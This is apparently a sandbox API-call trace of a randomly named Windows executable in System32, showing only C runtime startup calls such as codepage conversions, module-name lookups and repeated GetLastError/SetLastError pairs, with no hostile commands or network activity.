¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÍ\x9b", lpUsedDefaultChar=0x0) returned 256 [0035.327] GetLastError () returned 0x0 [0035.327] SetLastError (dwErrCode=0x0) [0035.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f8fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f8fc, cbMultiByte=256, lpWideCharStr=0x30f258, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.327] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.327] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x30f048, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0035.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x30f6fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÍ\x9b", lpUsedDefaultChar=0x0) returned 256 [0035.327] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.328] GetLastError () returned 0x0 [0035.328] SetLastError (dwErrCode=0x0) [0035.328] GetLastError () returned 0x0 [0035.328] SetLastError (dwErrCode=0x0) [0035.328] GetLastError () returned 0x0 [0035.328] SetLastError (dwErrCode=0x0) [0035.328] GetLastError () returned 0x0 [0035.328] SetLastError (dwErrCode=0x0) [0035.328] GetLastError () returned 0x0 [0035.328] SetLastError (dwErrCode=0x0) [0035.328] GetLastError () returned 0x0 [0035.328] SetLastError (dwErrCode=0x0) [0035.328] GetLastError () returned 0x0 [0035.328] SetLastError (dwErrCode=0x0) [0035.328] GetLastError () returned 0x0 [0035.328] SetLastError (dwErrCode=0x0) [0035.328] GetLastError () returned 0x0 [0035.328] SetLastError (dwErrCode=0x0) [0035.328] GetLastError () returned 0x0 [0035.328] SetLastError (dwErrCode=0x0) [0035.328] GetLastError () returned 0x0 [0035.328] SetLastError (dwErrCode=0x0) [0035.328] GetLastError () returned 0x0 [0035.329] SetLastError (dwErrCode=0x0) [0035.329] GetLastError () returned 0x0 [0035.329] SetLastError (dwErrCode=0x0) [0035.329] GetLastError () returned 0x0 [0035.329] SetLastError (dwErrCode=0x0) [0035.329] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.334] GetLastError () returned 0x0 [0035.334] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.335] GetLastError () returned 0x0 [0035.335] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.336] SetLastError (dwErrCode=0x0) [0035.336] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.337] SetLastError (dwErrCode=0x0) [0035.337] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.338] SetLastError (dwErrCode=0x0) [0035.338] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.339] SetLastError (dwErrCode=0x0) [0035.339] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.340] SetLastError (dwErrCode=0x0) [0035.340] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.341] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.341] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.341] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.341] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.341] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.341] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.341] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.341] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.341] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.341] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.341] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.341] GetLastError () returned 0x0 [0035.341] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.342] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.342] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.342] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.342] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.342] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.342] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.342] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.342] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.342] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.342] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.342] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.342] SetLastError (dwErrCode=0x0) [0035.342] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.343] SetLastError (dwErrCode=0x0) [0035.343] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.344] SetLastError (dwErrCode=0x0) [0035.344] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.345] SetLastError (dwErrCode=0x0) [0035.345] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.346] GetLastError () returned 0x0 [0035.346] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.347] SetLastError (dwErrCode=0x0) [0035.347] GetLastError () returned 0x0 [0035.348] SetLastError (dwErrCode=0x0) [0035.348] GetLastError () returned 0x0 [0035.348] SetLastError (dwErrCode=0x0) [0035.348] GetLastError () returned 0x0 [0035.348] SetLastError (dwErrCode=0x0) [0035.348] GetLastError () returned 0x0 [0035.348] SetLastError (dwErrCode=0x0) [0035.348] GetLastError () returned 0x0 [0035.348] SetLastError (dwErrCode=0x0) [0035.348] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0035.348] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0035.348] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0035.354] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fa78 | out: lpSystemTimeAsFileTime=0x30fa78*(dwLowDateTime=0xe2c27430, dwHighDateTime=0x1d3dfba)) [0035.354] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30f9b0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.354] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30f898, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.354] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] GetLastError () returned 0x0 [0035.355] 